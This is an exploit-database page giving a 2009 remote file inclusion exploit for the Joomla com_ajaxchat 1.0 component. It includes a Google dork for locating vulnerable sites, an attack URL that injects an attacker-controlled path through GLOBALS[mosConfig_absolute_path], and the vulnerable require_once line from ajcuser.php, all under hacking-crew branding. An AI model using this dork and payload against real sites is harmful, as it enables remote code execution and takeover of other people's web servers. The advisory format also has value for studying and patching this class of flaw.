[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Ajax Chat 1.0 remote file inclusion

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9930
Category
web applications
Date add
19-10-2009
Platform
unsorted
==========================================
Joomla Ajax Chat 1.0 remote file inclusion
==========================================


#############################################################################################################
## Joomla Component com_ajaxchat Remote File Include vulnerability                                         ##
## Author : kaMtiEz                                                                                        ##
## Homepage : http://www.indonesiancoder.com                                                               ##
## Date : September 27, 2009                                                                               ##
#############################################################################################################
# Hello My Name Is :                                                                                       ##
#  __               _____   __  ._____________                                                             ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                      ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                      ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                       ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                      ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-             ##
#############################################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.fijiwebdesign.com/
[+] Download : http://www.fijiwebdesign.com/
[+] version : 1.0 -
[+] Vulnerability : RFI
[+] price : $49.95
[+] Dork : inurl:"com_ajaxchat"
[+] Location : INDONESIA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
 
[ BUG IN ]
 
ajcuser.php
 
error in line 7
 
// include our comprofiler class
require_once($GLOBALS['mosConfig_absolute_path'].'/components/com_ajaxchat/plugins/plugin.user.php');





#  0day.today [2024-11-04]  #